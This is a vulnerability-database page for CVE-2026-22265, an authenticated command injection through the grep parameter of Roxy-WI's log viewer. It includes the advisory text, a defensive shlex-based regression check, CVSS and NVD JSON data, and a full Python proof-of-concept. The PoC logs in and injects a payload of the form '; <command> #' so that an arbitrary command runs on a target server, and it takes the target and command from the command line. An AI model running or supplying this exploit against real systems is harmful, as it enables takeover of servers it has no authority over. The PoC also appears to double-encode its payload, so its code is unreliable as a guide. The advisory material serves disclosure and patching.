Security Vulnerability Report
CVE-2026-22265 CVSS 7.5 HIGH

CVE-2026-22265

Published: 2026-01-15 17:16:08
Last Modified: 2026-02-18 17:38:55

Description

Roxy-WI is a web interface for managing HAProxy, Nginx, Apache and Keepalived servers. Prior to 8.2.8.2, a command injection vulnerability in the log viewing functionality allows authenticated users to execute arbitrary system commands. The vulnerability is at line 87 of app/modules/roxywi/logs.py, where the grep parameter is used twice: once sanitized and once raw. This vulnerability is fixed in 8.2.8.2.
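
A regression check for the bug class described above, where one value is quoted at one interpolation site and left raw at another. This is an added example, not Roxy-WI's code or its patch; the builder functions, the command shape and the probe values are constructed for illustration.

```python
import shlex

# Hypothetical command builders for illustration; not Roxy-WI's logs.py.
def build_vulnerable(log_path: str, grep: str) -> str:
    """Bug class from the description: same value quoted once, raw once."""
    quoted = shlex.quote(grep)
    return (f"cat {shlex.quote(log_path)} | grep -e {quoted} "
            f"| grep --color=never -e {grep}")      # second use is raw

def build_fixed(log_path: str, grep: str) -> str:
    """Quote once and reuse the quoted form at every interpolation site."""
    quoted = shlex.quote(grep)
    return (f"cat {shlex.quote(log_path)} | grep -e {quoted} "
            f"| grep --color=never -e {quoted}")

def value_survives(cmd: str, value: str, uses: int) -> bool:
    """True if `value` appears as exactly `uses` intact shell words in `cmd`."""
    try:
        words = shlex.split(cmd)    # POSIX word splitting only, nothing is run
    except ValueError:              # an unbalanced quote leaked into the command
        return False
    return words.count(value) == uses

# Constructed probe values. shlex.split models whitespace and quoting only,
# so each probe carries whitespace or a quote that a raw use cannot preserve.
PROBES = ["two words", "it's", "tab\there", 'say "hi"']

def audit(builder, log_path="/var/log/haproxy.log", uses=2):
    """Return the probes that a builder fails to pass through intact."""
    return [p for p in PROBES
            if not value_survives(builder(log_path, p), p, uses)]

if __name__ == "__main__":
    print("vulnerable builder breaks on:", audit(build_vulnerable))
    print("fixed builder breaks on:     ", audit(build_fixed))
```

A plain filter such as `error` passes through both builders unchanged, which is why a partially sanitized parameter can go unnoticed until a test feeds it whitespace or quotes.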

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* - VULNERABLE
Roxy-WI < 8.2.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22265 Roxy-WI Command Injection PoC
Affected: Roxy-WI < 8.2.8.2
Reference: https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47
"""

import requests
import sys
from urllib.parse import quote


def exploit_roxywi(target_url, username, password, command):
    """
    Exploit CVE-2026-22265: Command injection in logs.py grep parameter

    Args:
        target_url: Base URL of Roxy-WI instance
        username: Valid user credentials (low privilege is sufficient)
        password: User password
        command: System command to execute
    """
    session = requests.Session()

    # Step 1: Login to obtain session
    login_url = f"{target_url}/login"
    login_data = {
        'username': username,
        'password': password
    }

    try:
        response = session.post(login_url, data=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Login failed with status code: {response.status_code}")
            return False

        # Step 2: Inject command via grep parameter in logs module
        # The vulnerability is in app/modules/roxywi/logs.py line 87
        # grep parameter is used twice - once sanitized, once raw
        logs_url = f"{target_url}/logs"

        # Payload: escape sanitization and inject command
        # Using semicolon to chain commands, then comment out rest
        payload = f"'; {command} #"
        encoded_payload = quote(payload)

        exploit_data = {
            'serv': '1',
            'grep': encoded_payload,
            'log': '/var/log/haproxy.log'
        }

        response = session.post(logs_url, data=exploit_data, timeout=10)

        if response.status_code == 200:
            print(f"[+] Command injection successful!")
            print(f"[*] Command executed: {command}")
            return True
        else:
            print(f"[-] Exploitation failed with status code: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python3 cve-2026-22265.py <target_url> <username> <password> <command>")
        print("Example: python3 cve-2026-22265.py http://localhost:8080 admin password 'whoami'")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]

    print(f"[*] Targeting: {target}")
    print(f"[*] Credentials: {user}:{pwd}")
    print(f"[*] Target command: {cmd}")

    exploit_roxywi(target, user, pwd, cmd)

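References

https://github.com/roxy-wi/roxy-wi/commit/f040d3338c4ba6f66127487361592e32e0188eee (Patch)
https://github.com/roxy-wi/roxy-wi/releases/tag/v8.2.8.2 (Product, Release Notes)
https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47 (Exploit, Vendor Advisory)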

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22265", "sourceIdentifier": "[email protected]", "published": "2026-01-15T17:16:07.670", "lastModified": "2026-02-18T17:38:54.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Prior to 8.2.8.2, command injection vulnerability exists in the log viewing functionality that allows authenticated users to execute arbitrary system commands. The vulnerability is in app/modules/roxywi/logs.py line 87, where the grep parameter is used twice - once sanitized and once raw. This vulnerability is fixed in 8.2.8.2."}, {"lang": "es", "value": "Roxy-WI es una interfaz web para gestionar servidores Haproxy, Nginx, Apache y Keepalived. Anteriormente a la versión 8.2.8.2, existe una vulnerabilidad de inyección de comandos en la funcionalidad de visualización de registros que permite a usuarios autenticados ejecutar comandos de sistema arbitrarios. La vulnerabilidad se encuentra en app/modules/roxywi/logs.py línea 87, donde el parámetro grep se utiliza dos veces — una vez saneado y otra sin procesar. Esta vulnerabilidad se corrigió en la versión 8.2.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2.8.2", "matchCriteriaId": "29779791-CB73-48F7-A0FD-94C543DA082F"}]}]}], "references": [{"url": "https://github.com/roxy-wi/roxy-wi/commit/f040d3338c4ba6f66127487361592e32e0188eee", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/roxy-wi/roxy-wi/releases/tag/v8.2.8.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}